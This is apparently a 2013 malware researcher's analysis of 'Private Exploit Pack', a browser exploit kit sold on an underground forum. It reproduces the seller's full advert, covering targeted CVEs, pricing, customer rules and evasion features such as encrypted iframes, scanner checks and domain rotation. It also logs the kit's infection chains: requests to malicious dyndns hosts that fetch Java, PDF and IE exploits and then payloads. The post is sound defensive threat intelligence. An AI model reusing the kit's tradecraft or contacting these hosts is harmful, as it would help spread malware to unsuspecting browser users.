2013-07-05 - Study

"Private Exploit Pack" - new BEP featuring CVE-2013-1347


Private Exploit Pack
Animated Ad in Imposition signature

Since end of may "imposition" is advertising on underground forum a new browser exploit pack that come with name "Private Exploit Pack".
Private Exploit Pack Advert
Here is the Text of this advert :
------------------------------------------
[NEW]Private Exploit Pack || 6 exploits || Good Infection Rate || Unlimited Traffic
------------------------------------------
All the exploits have been tested with the following operating systems browsers and are working:
Windows xp(all service packs) 32bit
Windows 7(all service packs) 32bit
Windows 7(all service packs) 64bit
Windows Vista(all service packs) 64bit
Windows Vista(all service packs) 32bit
Windows 8(all service packs) 64bit
Windows 8(all service packs) 32bit
Google Chrome (Google requires users to allow plugins to run, so rates on Chrome are low just as it is with other exploit packs)
Firefox (Newer versions of Firefox requires users to allow plugins to run , so rates on Firefox are low just as it is with other exploit packs)
Microsoft Internet Explorer (The best rates come from Internet Explorers lack of security)
Opera (Opera has bad security and often times gets exploited)

Some of the notable features are as follows:
Advanced statistics showing you a lot of useful information
Iframe creator
Encrypted iframe creator
File upload and scan
Automatic file scanning via cron (no scan4you account needed)
Unique methods to make analysis more difficult and harder to download file to load (file wont get detected as fast/scanned on Virus Total) when pack is found in wild
Automatic cleaning of exploits
Professional code and server setup to hold high amounts of traffic
Unique ip for each user.


Current Exploits:
CVE-2013-2423 (Java TYPE) 
CVE-2013-1347 (IE UAF) 
CVE-2013-1493 (Java CMM) 
CVE-2011-3544 (Java Rhino) 
CVE-2010-0188 (PDF LIBTIFF) 
CVE-2006-0003 (MDAC) 


Pictures:
Chrome exploit rate:

FireFox exploit rate:

Internet Explorer exploit rate:
Opera exploit rate:
Overall exploit rate:
Files Page:
File Scanner:
Cost:
After looking around at other exploit pack prices I have decided that these prices are appropriate.
$50/day/unlimited traffic
$300/week/unlimited traffic (you get a discount for buying a week)
$1100/month/unlimited traffic (you get a discount for buying a month)

Payments:
Perfect Money
LTC
BTC
WMZ

Contact:
[email protected]

I have some rules I want all customers to follow, not following them can result in termination without a refund:
1.All traffic must be iframed.
2.You are not allowed to directly spread the link, refer to rule #1.
3.Only one person will get access to the account, please don't share with anyone else.
4.If you have any problems contact me on jabber or via PM before posting on the thread, 99.99% of the time I can help.
5.Don't pay with stolen money.
6.If you are paying with LTC/BTC you must pay exactly when I say. The prices fluctuate and I need to be able to sell them
immediately.
7.Payments must be made up front. If you don't pay before your subscription expires I won't prolong it until you pay again.
8.You must use a domain for the traffic. It doesn't matter if it is a free domain from a free service, but you aren't
allowed to use the exploit without a domain.

------------------------------------------
On another forum he wrotes few days ago :

"Today I have completed the Domain Rotator. To use the Domain Rotator you need to have a scan4you account, it will automatically disable detected domains."
------------------------------------------

When UnicornSec pointed that advert I was puzzled.
A new exploit pack featuring CVE-2013-1347 that has not been integrated by any other major "public" exploit kit...that sounds weird, especially seeing the forum on which it was first advertised.

The CVE-2013-1347 (IE8 kind of CVE-2012-4792 sister) has been discovered in the Departement of Labor Watering Hole Campaign by FireEye and the campaign itself has been spotted (Great job !) by Pedro Bustamante from ZeroVulnerabilityLabs (now Malwarebytes) on April 30. 
I was expecting a major adoption...but...no, even after its integration in Metasploit Framework.

Now let's fly over what i think (99% sure) is "Private Exploit Pack".

CVE-2006-0003 (MDAC) :

" If it works it works :D " - Imposition - 2013-06-11


CVE-2006-0003 MDAC on Private Exploit Pack


GET http://rluxikfytinunjep.dyndns-blog .com/blog/post.php?name=n0GpUcx&id=57216084&page=171
200 OK (text/html)  
fb770b3d35e76c6b18ea8a34698c733a

MDAC evidences in IE6 tailored landing from Private Exploit Pack


GET http://rluxikfytinunjep.dyndns-blog .com/blog/js/PluginDetect.js
200 OK (application/x-javascript)

Standard pinlady PluginDetect v0.7.6 
GET http://rluxikfytinunjep.dyndns-blog .com/blog/azdixcmhsv.php?gsczx=9505490&id=57216084
200 OK (application/octet-stream) 
14d82f60571ddd06b27262925b13c686




CVE-2013-1347 XP 32bits :

CVE-2013-1347 fired on a XP32bits IE8
CVE-2010-0188&CVE-2013-1347 vuln machine
GET http://jimujrymjeqw.dyndns-remote .com/blog/post.php?name=niSVjJ3&id=57216084&page=507
200 OK (text/html)

After some simplification the landing looks like : http://pastebin.com/raw.php?i=J8emsMv7
Which write this : http://pastebin.com/raw.php?i=b0sd0vVq
There is another tiny layer of obfuscation you can remove applying :
replace(/#/g,'').split("").reverse().join("");
On these kind of strings:

2nd layer of obfuscation
but easy to read
Once again there we can already draw the big part of the Exploit Graph and know in which order to probe this pack. But this is for the end :)

GET http://jimujrymjeqw.dyndns-remote .com/blog/js/PluginDetect.js
200 OK (application/x-javascript)

GET http://jimujrymjeqw.dyndns-remote .com/blog/js/getJavaInfo.jar
200 OK (application/java-archive) 18990a0a65a6fb3f0ffe1106168b4eac <-- Standard java version detect (same used in BH EK)

GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A/class.class
500 Internal Server Error (text/html)
GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A/class.class
500 Internal Server Error (text/html)

GET http://jimujrymjeqw.dyndns-remote .com/blog/xwncgmxctx.php?x=3547129&id=57216084
200 OK (text/html) 287d6405f01adbb708b147fec1127912

CVE-2013-1347 piece of code.
You'll see the onload script here : http://pastebin.com/8jWwYzGD
Good enough to escape Wepawet and Thug (for now :) )
1st Deobfuscation pass : http://pastebin.com/PJTrjH1Z


GET http://jimujrymjeqw.dyndns-remote .com/blog/xwncgmxctx.php?x=3373768&id=57216084
200 OK (application/pdf) 0a65bc2f031dcdcae92b78b571f6867d (CVE-2010-0188 )

GET http://jimujrymjeqw.dyndns-remote .com/blog/icakinsoef.php?x=3547129&id=57216084
200 OK (application/octet-stream) 2993567113be2b3b8f69a8610806e046

Payload trying to call home
CVE-2013-1347 x64 :


CVE-2013-1347 path on Win7 x64 in Private Exploit Pack
(GetInfoJar is not here cause of cache - but should be seen here)
GET http://droqmumrynota.dyndns-remote .com/blog/post.php?name=QcxDn&id=57216084&page=402
200 OK (text/html)  a91618b599d41ff9360b00128c04dcd4

GET http://droqmumrynota.dyndns-remote .com/blog/js/PluginDetect.js
200 OK (application/x-javascript)


GET http://jimujrymjeqw.dyndns-remote .com/blog/js/getJavaInfo.jar
200 OK (application/java-archive) 18990a0a65a6fb3f0ffe1106168b4eac 

GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A/class.class
500 Internal Server Error (text/html)
GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://jimujrymjeqw.dyndns-remote .com/blog/js/A/class.class
500 Internal Server Error (text/html)

GET http://droqmumrynota.dyndns-remote .com/blog/xwncgmxctx.php?x=3547129&id=57216084
200 OK (text/html) 4a45e19d9d63d10bef5f541021468f2e ( a deeper analyse would be good here)

GET http://droqmumrynota.dyndns-remote .com/blog/icakinsoef.php?x=3547129&id=57216084
200 OK (application/octet-stream)



CVE-2013-1493 :

CVE-2013-1493 in PEP
(here we should see the GetInfoJar.jar but was cached)
GET http://bsytoutivmipt.dyndns-remote .com/blog/post.php?name=Hi69d&id=57216084&page=559
200 OK (text/html)

GET http://bsytoutivmipt.dyndns-remote .com/blog/js/PluginDetect.js
200 OK (application/x-javascript)

GET http://bsytoutivmipt.dyndns-remote .com/blog/xwncgmxctx.php?x=0593922&id=57216084
200 OK (application/octet-stream) 74296a32e986db2da739af4f699091ab (CVE-2013-1493 & CVE-2013-2423 in that jar. Here CVE-2013-1493 is fired)

Piece of CVE-2013-1493 in a Private Exploit Pack Jar
GET http://bsytoutivmipt.dyndns-remote .com/blog/icakinsoef.php?x=0593922&id=57216084
200 OK (application/octet-stream)

CVE-2011-3544 :

CVE-2011-3544 fired in Private Exploit Pack
(note, forgetting emptying the Fiddler Cache we can't see the /blog/js/getJarInfo.jar but is supposed to be here)
GET http://hwetedya.dyndns-blog .com/blog/post.php?name=CaRiksrC&id=5717843&page=872
200 OK (text/html) de99e937d45dc16181fe3ea28c48dc16

GET http://hwetedya.dyndns-blog .com/blog/js/PluginDetect.js
200 OK (application/x-javascript)

GET http://droqmumrynota.dyndns-remote .com/blog/js/getJavaInfo.jar
200 OK (application/java-archive)

GET http://droqmumrynota.dyndns-remote.com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://droqmumrynota.dyndns-remote.com/blog/js/A/class.class
500 Internal Server Error (text/html)
GET http://droqmumrynota.dyndns-remote.com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://droqmumrynota.dyndns-remote.com/blog/js/A/class.class
500 Internal Server Error (text/html)

GET http://hwetedya.dyndns-blog .com/blog/ggxclalsip.php?u=4697669&id=5717843
200 OK (application/octet-stream) 2344f33f6058205ad3ef2dfdf1505c3f

CVE-2011-3544 in Private Exploit Pack
GET http://hwetedya.dyndns-blog .com/blog/com.class
500 Internal Server Error (text/html)
GET http://hwetedya.dyndns-blog .com/blog/edu.class
500 Internal Server Error (text/html)
GET http://hwetedya.dyndns-blog .com/blog/net.class
500 Internal Server Error (text/html)
GET http://hwetedya.dyndns-blog .com/blog/org.class
500 Internal Server Error (text/html)

GET http://hwetedya.dyndns-blog .com/blog/buwmweopow.php?u=4697669&id=5717843
200 OK (application/octet-stream) d424edadd516bab136fe898fd732d8c5

CVE-2013-2423 :

CVE-2013-2423 successful path in Private Exploit Pack 2013-07-03
GET http://droqmumrynota.dyndns-remote .com/blog/post.php?name=QcxDn&id=57216084&page=402
200 OK (text/html) 

Call for CVE-2013-2423 in the landing after 1 deobfuscation pass
Value after  replace(/#/g, '').split("").reverse().join("")
Jnlp in Private Exploit Pack


GET http://droqmumrynota.dyndns-remote .com/blog/js/PluginDetect.js
200 OK (application/x-javascript)

GET http://droqmumrynota.dyndns-remote .com/blog/js/getJavaInfo.jar
200 OK (application/java-archive)

GET http://droqmumrynota.dyndns-remote .com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://droqmumrynota.dyndns-remote .com/blog/js/A/class.class
500 Internal Server Error (text/html)
GET http://droqmumrynota.dyndns-remote .com/blog/js/A.class
500 Internal Server Error (text/html)
GET http://droqmumrynota.dyndns-remote .com/blog/js/A/class.class
500 Internal Server Error (text/html)

GET http://droqmumrynota.dyndns-remote .com/blog/xwncgmxctx.php?x=8130706&id=57216084
200 OK (application/octet-stream) 8ed49185441d906bbc3fdb82c0b98d81

CVE-2013-2423 in Private Exploit Pack Jar
GET http://droqmumrynota.dyndns-remote .com/blog/icakinsoef.php?x=8130706&id=57216084
200 OK (application/octet-stream)

And here is the Exploitation Graph :


PEP Exploitation Graph

Disclaimer : If i find any bug or things not working the way creator should expect it I usually try to avoid disclosing it.



<edit1 : 2013-08-05>
One month ago Imposition wrote that he had included CVE-2013-2460 ( Java SE 7 Update 21 and earlier)

"added Java SKEL CVE-2013-2460 to the exploit pack."

On 2013-07-17 he wrote :

"added the ability to upload file by url
added the ability to disable/enable infection on java 1.7.21 (it gives a prompt)
user can now change their own directory
now users can use proxies to forward to the server"

Note : prompt make infected domains/redirectors spotted faster...hence reduce time of cleaning and so more work for traff.

CVE-2013-2460 :
CVE-2013-2460 fired with Firefox 17 and Jre1.7 21 in win7 x64
GET http://calpalas .com/xUmEqHqYxi/uxrpdvcjbk.php?rehnreh=sjXovBJv&kjrthdrgs=13788997&rjthergsf=893
200 OK (text/html)

GET http://calpalas .com/xUmEqHqYxi/js/PluginDetect.js
200 OK (application/x-javascript)

GET http://calpalas .com/xUmEqHqYxi/ysixlnszfr.php?gdh=6035265&kjrthdrgs=13788997
200 OK (application/octet-stream)  e79367a11fca52cb054bbe38b9c8404d  Zip here (OwnCloud via goo.gl)

CVE-2013-2460 in PEP jar file



GET http://calpalas .com/xUmEqHqYxi/disbzrveqb.php?gdh=6035265&kjrthdrgs=13788997
200 OK (application/octet-stream) <-- A clickbot

Stats (showed on Forum by Imposition himself )
PEP stats (post CVE-2013-2460) - source : Imposition on Underground Forum
</edit1>

Credits :
Thanks to Symantec for assistance !
Props to Pedro Bustamante for Spotting the Dol.gov compromission !
Thanks UnicornSec for spotting the advert fews days after it was online
Props to Set Abominae who first spotted that stuff live
Set Abominae notifying about that new pack
Thanks to MalwareSigs for solid referer to that unknown EK who allowed me to cover first half of the CVEs